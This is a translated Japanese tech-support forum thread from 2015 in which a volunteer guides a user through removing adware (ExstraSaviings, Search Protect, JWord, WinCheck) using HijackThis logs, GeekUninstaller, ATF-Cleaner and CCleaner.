KDriveプラグイン kingsoft 2014/11/13 1.0.0.1
Lagarith Lossless Codec (1.3.27) 2014/02/15 1.02 MB
LAME v3.99.3 (for Windows) 2014/02/15 1.52 MB
Lhaplus 2014/11/13
LightCapture I-O DATA DEVICE,INC. 2014/02/12 1.10.0000
LimeChat 2 Satoshi Nakagawa 2014/11/13 2.40
LINE LINE Corporation 2014/11/13 3.7.3.82
McAfee Security Scan Plus McAfee, Inc. 2014/12/27 10.2 MB 3.8.150.1
Microsoft Age of Empires II 2014/11/13
Microsoft Age of Empires II: The Conquerors Expansion 2014/11/13
Microsoft OneDrive Microsoft Corporation 2015/03/13 30.6 MB 17.3.4726.0226
Microsoft Visual C++ 2005 Redistributable Microsoft Corporation 2014/08/19 2.69 MB 8.0.59193
Microsoft Visual C++ 2008 Redistributable - x86 9.0.21022 Microsoft Corporation 2014/02/12 3.70 MB 9.0.21022
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729 Microsoft Corporation 2014/06/30 598 KB 9.0.30729
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 Microsoft Corporation 2012/10/30 10.2 MB 9.0.30729
Microsoft Visual C++ 2010 x64 Redistributable - 10.0.40219 Microsoft Corporation 2014/04/12 13.8 MB 10.0.40219
Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 Microsoft Corporation 2014/04/12 11.1 MB 10.0.40219
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.60610 Microsoft Corporation 2014/11/13 20.5 MB 11.0.60610.1
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.60610 Microsoft Corporation 2014/11/13 17.3 MB 11.0.60610.1
Mozilla Firefox 36.0.1 (x86 ja) Mozilla 2015/03/14 84.4 MB 36.0.1
Mozilla Maintenance Service Mozilla 2014/11/13 225 KB 29.0
MyBookEditor4 Asukanet 2015/02/05 46.0 MB 1.3.76
NeoplePlugin 2014/11/13
Niconico Live Encoder niwango, inc. 2014/08/06 2.0.4
OpenSource Flash Video Splitter 1.0.0.5 2014/11/13 1.0.0.5
Pmangインストールマネージャー GameOn,Pmang 2014/11/13 1.0.1.1
Project 64 version 2.1.0.1 2014/11/13 9.64 MB 2.1.0.1
QuickTime 7 Apple Inc. 2014/08/30 70.2 MB 7.75.80.95
RPGツクール2000 ランタイムパッケージ 2014/11/13
RPGツクールVX Ace RTP Enterbrain 2014/03/14 194 MB 1.00
Search Protect Client Connect LTD 2015/03/19 2.21.200.26
Skype Click to Call Microsoft Corporation 2014/12/30 10.1 MB 7.3.16540.9015
Skype(TM) 7.1 Skype Technologies S.A. 2015/03/14 48.5 MB 7.1.105
SoundEngine Free Coderium 2012/10/31 5.0.0.6
Steam Valve Corporation 2014/11/13
TalesWeaver 2014/12/27
TERA GameOn 2015/02/12 8177808
Twitch Stream "" 2015/03/04
UnIDealsi 2014/02/25
Update for Japanese Microsoft IME Postal Code Dictionary Microsoft Corporation 2014/11/16 7.60 MB 16.0.1171.1
Update for Japanese Microsoft IME Standard Dictionary Microsoft Corporation 2014/11/16 40.3 MB 16.0.1404.1
Update for Japanese Microsoft IME Standard Extended Dictionary Microsoft Corporation 2014/11/16 11.5 MB 15.0.1215
Update for Japanese Microsoft IME Trending Words Dictionary Microsoft Corporation 2015/01/07 17.0 KB 16.0.1016.1
USB PC Camera (SN9C102) 2014/11/13 4.7.5.0
Ut Video Codec Suite UMEZAWA Takeshi 2013/10/28 1.97 MB 13.3.0
VIA プラットフォーム・デバイス・マネージャ VIA Technologies, Inc. 2012/10/30 2.62 MB 1.39
WinCheck WinCheck 2015/02/27 1.0.0.0
youtubeadblocker 2014/02/25
♪超録 - パソコン長時間録音機 フリーウェア版 2014/11/13
つよきす3学期 INTERHEART 2014/11/13 4.88 GB 1.9
ニコ生デスクトップキャプチャー(XP) SEASON2 Consolas 2012/10/31 1.41 MB 1.15
モンスターハンター フロンティアG CAPCOM CO., LTD. 2014/08/21 1.27.2000
俺たちに翼はないR Navel 2014/11/20 Version 1.00
幻想神域 X-Legend 2014/05/16 1.0000


That is all.
I would be grateful if you could tell me the solution.
  • かなは
  • 2015/03/20 (Fri) 23:45:15
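I'm sorry, but the log once more, please
I have checked the logs.
I'm sorry, but the system information section at the very top of the HJT log has been cut off.
Without checking the system information I cannot take appropriate measures,
so I'm sorry for the trouble, but please provide it; just the part that was cut off is fine.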
  • IVNO
  • MAIL
  • 2015/03/21 (Sat) 00:53:04
Re: Popups and ads are being forcibly displayed and I need help.
I'm sorry about that.
How is this?

Logfile of Trend Micro HijackThis v2.0.5
Scan saved at 2:21:50, on 2015/03/21
Platform: Unknown Windows (WinNT 6.02.1008)
MSIE: Internet Explorer v11.0 (11.00.9600.17416)

FIREFOX: 36.0.1 (x86 ja)
Boot mode: Normal

Running processes:
C:\Program Files (x86)\Naver\LINE\Line.exe
C:\Program Files (x86)\Skype\Phone\Skype.exe
C:\Program Files (x86)\i-Funbox DevTeam\iFunBox.exe
C:\ProgramData\{021e6b93-a7a5-9558-021e-e6b93a7aae4e}\Battle Network Rockman Exe 3 Black (Japan) (V1.1).exe
C:\Program Files (x86)\DivX\DivX Update\DivXUpdate.exe
C:\Program Files (x86)\iTunes\iTunesHelper.exe
C:\PROGRA~2\SEARCH~1\SearchProtect\bin\cltmng.exe
C:\PROGRA~2\SEARCH~1\UI\bin\cltmngui.exe
C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\ATH.exe
C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\ATH.exe
C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\ATH.exe
C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\SyncServer.exe
C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\ATH.exe
C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\ATH.exe
C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\ATH.exe
C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\ATH.exe
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\Users\ryota\Downloads\HijackThis (1).exe

F2 - REG:system.ini: UserInit=userinit.exe
O2 - BHO: ExstraSaviings - {78f73e11-e6b2-48a8-88b7-9c9db3ca8dc5} - C:\Program Files (x86)\ExstraSaviings\bW26gfXJvpMiqk.dll
O4 - HKLM\..\Run: [HDAudDeck] C:\Program Files (x86)\VIA\VIAudioi\VDeck\VDeck.exe -r
O4 - HKLM\..\Run: [APSDaemon] "C:\Program Files (x86)\Common Files\Apple\Apple Application Support\APSDaemon.exe"
O4 - HKLM\..\Run: [Google Japanese Input Prelauncher] "C:\Program Files (x86)\Google\Google Japanese Input\GoogleIMEJaBroker32.exe" --mode=prelaunch_processes
O4 - HKLM\..\Run: [Adobe ARM] "C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe"
O4 - HKLM\..\Run: [DivXUpdate] "C:\Program Files (x86)\DivX\DivX Update\DivXUpdate.exe" /CHECKNOW
O4 - HKLM\..\Run: [au_WiFi_Connect] "C:\Program Files (x86)\au Wi-Fi接続ツール\au_WiFi_Connect.exe" -x
O4 - HKLM\..\Run: [QuickTime Task] "C:\Program Files (x86)\QuickTime\QTTask.exe" -atboottime
O4 - HKLM\..\Run: [iTunesHelper] "C:\Program Files (x86)\iTunes\iTunesHelper.exe"
O4 - HKLM\..\Run: [CnsMin] Rundll32.exe C:\Windows\DOWNLO~1\CnsMin.dll,Rundll32
O4 - HKLM\..\Run: [WinCheck] C:\Users\ryota\AppData\Local\03000200-1425075226-0500-0006-000700080009\bnsq55B.exe
O4 - HKCU\..\Run: [ApplicationManager] C:\Users\ryota\AppData\Roaming\ApplicationManager\bin\ApplicationManager.exe
O4 - HKCU\..\Run: [Line] "C:\Program Files (x86)\Naver\LINE\Line.exe" --booting
O4 - HKCU\..\Run: [Skype] "C:\Program Files (x86)\Skype\Phone\Skype.exe" /minimized /regrun
O4 - HKCU\..\Run: [DAEMON Tools Lite] "C:\Program Files (x86)\DAEMON Tools Lite\DTLite.exe" -autorun
O4 - HKCU\..\Run: [iFunBox Fast App Install Handler] C:\Program Files (x86)\i-Funbox DevTeam\iFunBox.exe /tray
O4 - HKCU\..\Run: [OneDrive] "C:\Users\ryota\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background
O4 - HKCU\..\Run: [CCleaner Monitoring] "C:\Program Files\CCleaner\CCleaner64.exe" /MONITOR
O4 - Startup: Battle Network Rockman Exe 3 Black (Japan) (V1.1).lnk = C:\ProgramData\{021e6b93-a7a5-9558-021e-e6b93a7aae4e}\Battle Network Rockman Exe 3 Black (Japan) (V1.1).exe
O4 - Global Startup: McAfee Security Scan Plus.lnk = C:\Program Files\McAfee Security Scan\3.8.150\SSScheduler.exe
O9 - Extra button: JWord(日本語キーワード) - {5D73EE86-05F1-49ed-B850-E423120EC338} - http://www.jword.jp/intro/?partner=AP&type=lk&frm=iebutton (file missing)
O9 - Extra button: Skype Click to Call settings - {898EA8C8-E7FF-479B-8935-AEC46303B9E5} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll
O11 - Options group: [!CNS] JWord(日本語キーワード)
O11 - Options group: [ACCELERATED_GRAPHICS] Accelerated graphics
O15 - ESC Trusted Zone: http://*.update.microsoft.com
O16 - DPF: {1DC420F0-D89A-40D0-B5CC-92B9AD19A1AC} (HGPluginJP28 Class) - http://down.hangame.co.jp/jp/dist/hgstart/HGPluginJP28.cab
O16 - DPF: {255A2E53-D2E3-42DA-9C1D-36B289B8E18B} (DMMLauncherAx Control) - http://dl.app-netgame.dmm.com/launcher/DMMLauncherAx_32.cab
O16 - DPF: {5082D9B5-5538-4C50-BDB1-C5F44BFB98CC} (HgRunPub Class) - http://down.hangame.co.jp/jp/installer/HgRunPub.cab
O16 - DPF: {AA07EBD2-EBDD-4BD6-9F8F-114BD513492C} (NeffyLauncherCtl Class) - http://dist.cdnetworks.co.jp/cdndist/neffy/NeffyLauncher.cab
O16 - DPF: {D4B68B83-8710-488B-A692-D74B50BA558E} (Creative Software AutoUpdate Support Package 2) - http://ccfiles.creative.com/Web/softwareupdate/ocx/15113/CTPIDPDE.cab
O16 - DPF: {E705A591-DA3C-4228-B0D5-A356DBA42FBF} (Creative Software AutoUpdate 2) - http://ccfiles.creative.com/Web/softwareupdate/su2/ocx/20015/CTSUEng.cab
O16 - DPF: {F6ACF75C-C32C-447B-9BEF-46B766368D29} (Creative Software AutoUpdate Support Package) - http://ccfiles.creative.com/Web/softwareupdate/ocx/121022/CTPID.cab
O16 - DPF: {F8160836-0C11-4CA4-AD87-944542C7BCBD} (PubPlugin Class) - http://down.hangame.co.jp/jp/purple/launcher/PubPlugin.cab
O17 - HKLM\System\CCS\Services\Tcpip\..\{0693221B-E6F5-43F7-953D-6A2229EB2054}: NameServer = 60.56.0.135 218.251.89.134
O17 - HKLM\System\CS1\Services\Tcpip\..\{0693221B-E6F5-43F7-953D-6A2229EB2054}: NameServer = 60.56.0.135 218.251.89.134
O18 - Protocol: skype4com - {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - C:\PROGRA~2\COMMON~1\Skype\SKYPE4~1.DLL
O18 - Protocol: skypec2c - {91774881-D725-4E58-B298-07617B9B86A8} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll
O20 - AppInit_DLLs: C:\PROGRA~2\SearchProtect\SearchProtect\bin\VC32Loader.dll
O23 - Service: Adobe Acrobat Update Service (AdobeARMservice) - Adobe Systems Incorporated - C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
O23 - Service: Adobe Flash Player Update Service (AdobeFlashPlayerUpdateSvc) - Adobe Systems Incorporated - C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe
O23 - Service: @%SystemRoot%\system32\Alg.exe,-112 (ALG) - Unknown owner - C:\WINDOWS\System32\alg.exe (file missing)
O23 - Service: Apple Mobile Device - Apple Inc. - C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
O23 - Service: auWifiConnectSvc - Unknown owner - C:\Program Files (x86)\au Wi-Fi接続ツール\auWifiConnectSvc.exe (file missing)
O23 - Service: Search Protect Service (CltMngSvc) - Client Connect LTD - C:\Program Files (x86)\SearchProtect\Main\bin\CltMngSvc.exe
O23 - Service: Intel(R) Content Protection HECI Service (cphs) - Intel Corporation - C:\WINDOWS\SysWow64\IntelCpHeciSvc.exe
O23 - Service: @%SystemRoot%\system32\efssvc.dll,-100 (EFS) - Unknown owner - C:\WINDOWS\System32\lsass.exe (file missing)
O23 - Service: @%systemroot%\system32\fxsresm.dll,-118 (Fax) - Unknown owner - C:\WINDOWS\system32\fxssvc.exe (file missing)
O23 - Service: Freemake Improver - Freemake - C:\ProgramData\Freemake\FreemakeUtilsService\FreemakeUtilsService.exe
O23 - Service: Google Japanese Input Cache Service (GoogleIMEJaCacheService) - Google Inc. - C:\Program Files (x86)\Google\Google Japanese Input\GoogleIMEJaCacheService.exe
O23 - Service: Google Update サービス (gupdate) (gupdate) - Google Inc. - C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
O23 - Service: Google Update サービス (gupdatem) (gupdatem) - Google Inc. - C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
O23 - Service: @%SystemRoot%\system32\ieetwcollectorres.dll,-1000 (IEEtwCollectorService) - Unknown owner - C:\WINDOWS\system32\IEEtwCollector.exe (file missing)
O23 - Service: Intel(R) HD Graphics Control Panel Service (igfxCUIService1.0.0.0) - Unknown owner - C:\WINDOWS\system32\igfxCUIService.exe (file missing)
O23 - Service: Intel(R) Capability Licensing Service Interface - Intel(R) Corporation - C:\Program Files\Intel\iCLS Client\HeciServer.exe
O23 - Service: iPod サービス (iPod Service) - Apple Inc. - C:\Program Files\iPod\bin\iPodService.exe
O23 - Service: Intel(R) Dynamic Application Loader Host Interface Service (jhi_service) - Intel Corporation - C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\DAL\jhi_service.exe
O23 - Service: @keyiso.dll,-100 (KeyIso) - Unknown owner - C:\WINDOWS\system32\lsass.exe (file missing)
O23 - Service: Intel(R) Management and Security Application Local Management Service (LMS) - Intel Corporation - C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\LMS\LMS.exe
O23 - Service: McAfee Security Scan Component Host Service (McComponentHostService) - McAfee, Inc. - C:\Program Files\McAfee Security Scan\3.8.150\McCHSvc.exe
O23 - Service: Mozilla Maintenance Service (MozillaMaintenance) - Mozilla Foundation - C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe
O23 - Service: @comres.dll,-2797 (MSDTC) - Unknown owner - C:\WINDOWS\System32\msdtc.exe (file missing)
O23 - Service: @%SystemRoot%\System32\netlogon.dll,-102 (Netlogon) - Unknown owner - C:\WINDOWS\system32\lsass.exe (file missing)
O23 - Service: @%systemroot%\system32\Locator.exe,-2 (RpcLocator) - Unknown owner - C:\WINDOWS\system32\locator.exe (file missing)
O23 - Service: @%SystemRoot%\system32\samsrv.dll,-1 (SamSs) - Unknown owner - C:\WINDOWS\system32\lsass.exe (file missing)
O23 - Service: Skype Updater (SkypeUpdate) - Skype Technologies - C:\Program Files (x86)\Skype\Updater\Updater.exe
O23 - Service: @%SystemRoot%\system32\snmptrap.exe,-3 (SNMPTRAP) - Unknown owner - C:\WINDOWS\System32\snmptrap.exe (file missing)
O23 - Service: @%systemroot%\system32\spoolsv.exe,-1 (Spooler) - Unknown owner - C:\WINDOWS\System32\spoolsv.exe (file missing)
O23 - Service: @%SystemRoot%\system32\sppsvc.exe,-101 (sppsvc) - Unknown owner - C:\WINDOWS\system32\sppsvc.exe (file missing)
O23 - Service: Steam Client Service - Valve Corporation - C:\Program Files (x86)\Common Files\Steam\SteamService.exe
O23 - Service: Tango Core Service (TangoCoreService) - Unknown owner - C:\Program Files (x86)\Siemens\Common\TangoCoreService.exe
O23 - Service: @%SystemRoot%\system32\ui0detect.exe,-101 (UI0Detect) - Unknown owner - C:\WINDOWS\system32\UI0Detect.exe (file missing)
O23 - Service: Intel(R) Management and Security Application User Notification Service (UNS) - Intel Corporation - C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\UNS\UNS.exe
O23 - Service: @%SystemRoot%\system32\vaultsvc.dll,-1003 (VaultSvc) - Unknown owner - C:\WINDOWS\system32\lsass.exe (file missing)
O23 - Service: @%SystemRoot%\system32\vds.exe,-100 (vds) - Unknown owner - C:\WINDOWS\System32\vds.exe (file missing)
O23 - Service: @oem4.inf,%ViaKaraokeSrv.SvcDesc%;VIA Karaoke digital mixer Service (VIAKaraokeService) - Unknown owner - C:\WINDOWS\system32\viakaraokesrv.exe (file missing)
O23 - Service: @%systemroot%\system32\vssvc.exe,-102 (VSS) - Unknown owner - C:\WINDOWS\system32\vssvc.exe (file missing)
O23 - Service: @%systemroot%\system32\wbengine.exe,-104 (wbengine) - Unknown owner - C:\WINDOWS\system32\wbengine.exe (file missing)
O23 - Service: @%ProgramFiles%\Windows Defender\MpAsDesc.dll,-320 (WdNisSvc) - Unknown owner - C:\Program Files (x86)\Windows Defender\NisSrv.exe (file missing)
O23 - Service: @%ProgramFiles%\Windows Defender\MpAsDesc.dll,-310 (WinDefend) - Unknown owner - C:\Program Files (x86)\Windows Defender\MsMpEng.exe (file missing)
O23 - Service: @%Systemroot%\system32\wbem\wmiapsrv.exe,-110 (wmiApSrv) - Unknown owner - C:\WINDOWS\system32\wbem\WmiApSrv.exe (file missing)
O23 - Service: @%PROGRAMFILES%\Windows Media Player\wmpnetwk.exe,-101 (WMPNetworkSvc) - Unknown owner - C:\Program Files (x86)\Windows Media Player\wmpnetwk.exe (file missing)

--
End of file - 12313 bytes
  • かなは
  • 2015/03/21 (Sat) 02:22:41
That one is fine
So it is Windows 8.1, and your main browser is Firefox.
Thank you for providing that.
Now let's get ready for the work.

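First, a few notices.
After you post, it may take a day or more each time before I can reply.
I apologize for the inconvenience and ask for your understanding and cooperation.
Also, the removal work continues until the responder declares the case "resolved".
For that reason, when people stop partway because the PC seems to have improved, without waiting for the resolution notice,
the problem very often recurs, and many of them end up coming back here when it does.
Please keep working until the responder has given you both the "resolved" notice and the "self-defense measures".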

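Now read the following explanations carefully and carry out the steps in order.
You should already have some of these ready, but please look over the explanations once more anyway.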

Set hidden files and file extensions to be shown (how to ↓)
http://pasofaq.jp/windows/mycomputer/hiddenfile.htm
http://support.microsoft.com/kb/978449/ja

Download the tools below and get familiar with their basic usage.
Note that the distribution sites may show ads urging you to download other software;
never click those.
"ATF-Cleaner" (ATF for short)
Description ↓
http://freesoft.tvbok.com/freesoft/pc_system/atf-cleaner.html
Download ↓
http://www.atribune.org/index.php?option=com_content&task=view&id=25&Itemid=1
The red text in the center is the download link.
To clean up afterwards, delete the file directly.
The description page says it supports Windows XP and 2000, but it also works on Win7 and Vista.

GeekUninstaller (Geek for short)
Download
http://www.geekuninstaller.com/geek.zip
This is a direct link to the file. It is a zip file, so extract it before use.
To remove it, just put it in the Recycle Bin.
Guide
http://www.gigafree.net/system/install/geekuninstaller.html

"CCleaner" (CC for short)
Description ↓
http://www.gigafree.net/system/clean/ccleaner.html
http://note.chiebukuro.yahoo.co.jp/detail/n178757
Download ↓
http://www.piriform.com/ccleaner/download/standard
Be sure to download the latest version.
The installer may also offer bundled extra apps; uncheck them and do not install them.
To remove it, uninstall it with Geek or a similar tool.

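Here is an important warning.
CC is by nature a highly capable maintenance tool, but if it is used incorrectly
【some operations can leave Windows unable to run】,
so here we use it only as an analysis tool.
Read the explanation carefully and do not perform any operation other than the ones I specify.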

Once you are ready, let's begin.

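So that you can recover immediately if trouble occurs during the removal work that follows, manually create a System Restore point.
http://windows.microsoft.com/ja-jp/windows7/create-a-restore-point
However, System Restore does considerable damage to the PC, so it is preferable not to use it if possible.
Work carefully so that System Restore is not needed.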

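Start the PC in Safe Mode (how to ↓)
http://121ware.com/qasearch/1007/app/servlet/relatedqa?QID=015917
Launch HJT and run a scan.
When the scan results appear, check the following items.
However, with HJT in particular, a single mistake can easily leave the PC unable to boot,
so never check anything other than what I have specified.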

O2 - BHO: ExstraSaviings - {78f73e11-e6b2-48a8-88b7-9c9db3ca8dc5} - C:\Program Files (x86)\ExstraSaviings\bW26gfXJvpMiqk.dll
O4 - HKLM\..\Run: [CnsMin] Rundll32.exe C:\Windows\DOWNLO~1\CnsMin.dll,Rundll32
O4 - Global Startup: MCAFEE SECURITY SCAN Plus.lnk = C:\Program Files\MCAFEE SECURITY SCAN\3.8.150\SSScheduler.exe
O9 - Extra button: JWord(日本語キーワード) - {5D73EE86-05F1-49ed-B850-E423120EC338} - http://www.jword.jp/intro/?partner=AP&type=lk&frm=iebutton (file missing)
O11 - Options group: [!CNS] JWord(日本語キーワード)
O20 - AppInit_DLLs: C:\PROGRA~2\SearchProtect\SearchProtect\bin\VC32Loader.dll
O23 - Service: Search Protect Service (CltMngSvc) - Client Connect LTD - C:\Program Files (x86)\SearchProtect\Main\bin\CltMngSvc.exe
O23 - Service: Freemake Improver - Freemake - C:\ProgramData\Freemake\FreemakeUtilsService\FreemakeUtilsService.exe
O23 - Service: McAfee Security Scan Component Host Service (McComponentHostService) - McAfee, Inc. - C:\Program Files\McAfee Security Scan\3.8.150\McCHSvc.exe

Once all the required items are checked, click Fix checked.
When the Fix above is complete, launch Geek and remove the following.

AAlllSaveer "" 2015/03/04
Craving Explorer Version 1.6.4 T-Craft 2014/08/06 26.6 MB 1.6.4.0
DiscounnTExeteensii "" 2015/03/04
Explzh for Windows (64bit) pon software 2014/11/13 7.1.7.0
ExstraSaviings "" 2015/03/06
FlvPlayer 2014/11/13 ${VERSION}
Freemake Audio Converter バージョン 1.1.0 Ellora Assets Corporation 2014/06/29 49.4 MB 1.1.0
Isaverr "" 2015/03/04
JWord(日本語キーワード) 2014/11/13
McAfee Security Scan Plus McAfee, Inc. 2014/12/27 10.2 MB 3.8.150.1
Search Protect Client Connect LTD 2015/03/19 2.21.200.26
Twitch Stream "" 2015/03/04
UnIDealsi 2014/02/25
WinCheck WinCheck 2015/02/27 1.0.0.0
youtubeadblocker 2014/02/25

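You can remove them by double-clicking.
When a removal finishes, a scan starts automatically; check all the leftovers it detects and press OK.
When uninstalling with Geek is complete, close Geek and clean up with ATF.
Check Select All and click Empty Selected.
When the ATF cleanup is complete, restart the PC in normal mode.
Then please paste the HJT and CC logs into the reply field once more and let me know.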
  • IVNO
  • MAIL
  • 2015/03/21 (Sat) 04:03:39
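Re: I'm having trouble with pop-ups and ads being forcibly displayed.
I'm sorry to have kept you waiting so long.
The work took time, so I am late getting back to you.
I am pasting the logs from after the work below, so please give me the next instructions.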

HJT

Logfile of Trend Micro HijackThis v2.0.4
Scan saved at 17:29:04, on 2015/04/04
Platform: Unknown Windows (WinNT 6.03.1408)
MSIE: Internet Explorer v11.0 (11.00.9600.17416)
Boot mode: Safe mode

Running processes:
C:\Program Files (x86)\Trend Micro\HiJackThis\HiJackThis.exe

F2 - REG:system.ini: UserInit=userinit.exe
O2 - BHO: TakeTHeCoupon - {6a6b254b-05d3-451a-9396-b7247e2e114e} - C:\Program Files (x86)\TakeTHeCoupon\CWRQMaSXmAvceq.dll
O2 - BHO: SaverExxtensiion - {6ec8ea13-7d70-415f-ab97-2aa8f4082c82} - C:\Program Files (x86)\SaverExxtensiion\LyRYa1TqoTYmQU.dll
O2 - BHO: ExstraSaviings - {78f73e11-e6b2-48a8-88b7-9c9db3ca8dc5} - C:\Program Files (x86)\ExstraSaviings\bW26gfXJvpMiqk.dll
O4 - HKLM\..\Run: [HDAudDeck] C:\Program Files (x86)\VIA\VIAudioi\VDeck\VDeck.exe -r
O4 - HKLM\..\Run: [APSDaemon] "C:\Program Files (x86)\Common Files\Apple\Apple Application Support\APSDaemon.exe"
O4 - HKLM\..\Run: [Google Japanese Input Prelauncher] "C:\Program Files (x86)\Google\Google Japanese Input\GoogleIMEJaBroker32.exe" --mode=prelaunch_processes
O4 - HKLM\..\Run: [Adobe ARM] "C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe"
O4 - HKLM\..\Run: [DivXUpdate] "C:\Program Files (x86)\DivX\DivX Update\DivXUpdate.exe" /CHECKNOW
O4 - HKLM\..\Run: [au_WiFi_Connect] "C:\Program Files (x86)\au Wi-Fi接続ツール\au_WiFi_Connect.exe" -x
O4 - HKLM\..\Run: [QuickTime Task] "C:\Program Files (x86)\QuickTime\QTTask.exe" -atboottime
O4 - HKLM\..\Run: [iTunesHelper] "C:\Program Files (x86)\iTunes\iTunesHelper.exe"
O4 - HKLM\..\Run: [CnsMin] Rundll32.exe C:\Windows\DOWNLO~1\CnsMin.dll,Rundll32
O4 - HKLM\..\Run: [WinCheck] C:\Users\ryota\AppData\Local\03000200-1425075226-0500-0006-000700080009\bnsq55B.exe
O4 - HKCU\..\Run: [ApplicationManager] C:\Users\ryota\AppData\Roaming\ApplicationManager\bin\ApplicationManager.exe
O4 - HKCU\..\Run: [Line] "C:\Program Files (x86)\Naver\LINE\Line.exe" --booting
O4 - HKCU\..\Run: [Skype] "C:\Program Files (x86)\Skype\Phone\Skype.exe" /minimized /regrun
O4 - HKCU\..\Run: [DAEMON Tools Lite] "C:\Program Files (x86)\DAEMON Tools Lite\DTLite.exe" -autorun
O4 - HKCU\..\Run: [iFunBox Fast App Install Handler] C:\Program Files (x86)\i-Funbox DevTeam\iFunBox.exe /tray
O4 - HKCU\..\Run: [OneDrive] "C:\Users\ryota\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background
O4 - HKCU\..\Run: [CCleaner Monitoring] "C:\Program Files\CCleaner\CCleaner64.exe" /MONITOR
O4 - Startup: Battle Network Rockman Exe 3 Black (Japan) (V1.1).lnk = C:\ProgramData\{021e6b93-a7a5-9558-021e-e6b93a7aae4e}\Battle Network Rockman Exe 3 Black (Japan) (V1.1).exe
O4 - Global Startup: McAfee Security Scan Plus.lnk = C:\Program Files\McAfee Security Scan\3.8.150\SSScheduler.exe
O9 - Extra button: JWord(日本語キーワード) - {5D73EE86-05F1-49ed-B850-E423120EC338} - http://www.jword.jp/intro/?partner=AP&type=lk&frm=iebutton (file missing)
O9 - Extra button: Skype Click to Call settings - {898EA8C8-E7FF-479B-8935-AEC46303B9E5} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll
O11 - Options group: [!CNS] JWord(日本語キーワード)
O11 - Options group: [ACCELERATED_GRAPHICS] Accelerated graphics
O15 - ESC Trusted Zone: http://*.update.microsoft.com
O16 - DPF: {1DC420F0-D89A-40D0-B5CC-92B9AD19A1AC} (HGPluginJP28 Class) - http://down.hangame.co.jp/jp/dist/hgstart/HGPluginJP28.cab
O16 - DPF: {255A2E53-D2E3-42DA-9C1D-36B289B8E18B} (DMMLauncherAx Control) - http://dl.app-netgame.dmm.com/launcher/DMMLauncherAx_32.cab
O16 - DPF: {5082D9B5-5538-4C50-BDB1-C5F44BFB98CC} (HgRunPub Class) - http://down.hangame.co.jp/jp/installer/HgRunPub.cab
O16 - DPF: {AA07EBD2-EBDD-4BD6-9F8F-114BD513492C} (NeffyLauncherCtl Class) - http://dist.cdnetworks.co.jp/cdndist/neffy/NeffyLauncher.cab
O16 - DPF: {D4B68B83-8710-488B-A692-D74B50BA558E} (Creative Software AutoUpdate Support Package 2) - http://ccfiles.creative.com/Web/softwareupdate/ocx/15113/CTPIDPDE.cab
O16 - DPF: {E705A591-DA3C-4228-B0D5-A356DBA42FBF} (Creative Software AutoUpdate 2) - http://ccfiles.creative.com/Web/softwareupdate/su2/ocx/20015/CTSUEng.cab
O16 - DPF: {F6ACF75C-C32C-447B-9BEF-46B766368D29} (Creative Software AutoUpdate Support Package) - http://ccfiles.creative.com/Web/softwareupdate/ocx/121022/CTPID.cab
O16 - DPF: {F8160836-0C11-4CA4-AD87-944542C7BCBD} (PubPlugin Class) - http://down.hangame.co.jp/jp/purple/launcher/PubPlugin.cab
O18 - Protocol: skype4com - {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - C:\PROGRA~2\COMMON~1\Skype\SKYPE4~1.DLL
O18 - Protocol: skypec2c - {91774881-D725-4E58-B298-07617B9B86A8} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll
O20 - AppInit_DLLs: C:\PROGRA~2\SearchProtect\SearchProtect\bin\VC32Loader.dll
O23 - Service: Adobe Acrobat Update Service (AdobeARMservice) - Adobe Systems Incorporated - C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
O23 - Service: Adobe Flash Player Update Service (AdobeFlashPlayerUpdateSvc) - Adobe Systems Incorporated - C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe
O23 - Service: @%SystemRoot%\system32\Alg.exe,-112 (ALG) - Unknown owner - C:\WINDOWS\System32\alg.exe (file missing)
O23 - Service: Apple Mobile Device - Apple Inc. - C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
O23 - Service: auWifiConnectSvc - Unknown owner - C:\Program Files (x86)\au Wi-Fi接続ツール\auWifiConnectSvc.exe (file missing)
O23 - Service: Search Protect Service (CltMngSvc) - Client Connect LTD - C:\Program Files (x86)\SearchProtect\Main\bin\CltMngSvc.exe
